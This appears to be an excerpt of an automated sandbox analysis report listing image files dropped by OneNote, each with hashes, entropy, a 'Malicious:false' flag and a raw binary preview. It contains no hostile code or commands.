                                                                                                        Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19235
                                                                                                        Entropy (8bit):7.944867159042578
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                        MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                        SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                        SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                        SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11449
                                                                                                        Entropy (8bit):7.91552812501629
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                        MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                        SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                        SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                        SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11886
                                                                                                        Entropy (8bit):7.946442244439929
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                        MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                        SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                        SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                        SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19235
                                                                                                        Entropy (8bit):7.944867159042578
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                        MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                        SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                        SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                        SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.943341403425058
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                        MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                        SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                        SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                        SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.950380155401321
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                        MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                        SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                        SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                        SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2270
                                                                                                        Entropy (8bit):7.845368393313232
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                        MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                        SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                        SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                        SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):39010
                                                                                                        Entropy (8bit):7.362726513389497
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                        MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                        SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                        SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                        SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4847
                                                                                                        Entropy (8bit):7.950192613458318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                        MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                        SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                        SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                        SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22634
                                                                                                        Entropy (8bit):7.974332204835705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                        MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                        SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                        SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                        SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 50 x 600, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4410
                                                                                                        Entropy (8bit):7.857636973514526
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
                                                                                                        MD5:2494381A1ACDC83843B912CFCDE5643B
                                                                                                        SHA1:98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
                                                                                                        SHA-256:5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
                                                                                                        SHA-512:0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}|..{'.U..~......}....s.............,CVu.x.:C..5...;.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):40035
                                                                                                        Entropy (8bit):7.360144465307449
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
                                                                                                        MD5:B1DDD365D87605F96D72042CB56572F6
                                                                                                        SHA1:ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
                                                                                                        SHA-256:06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
                                                                                                        SHA-512:9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
                                                                                                        Malicious:false
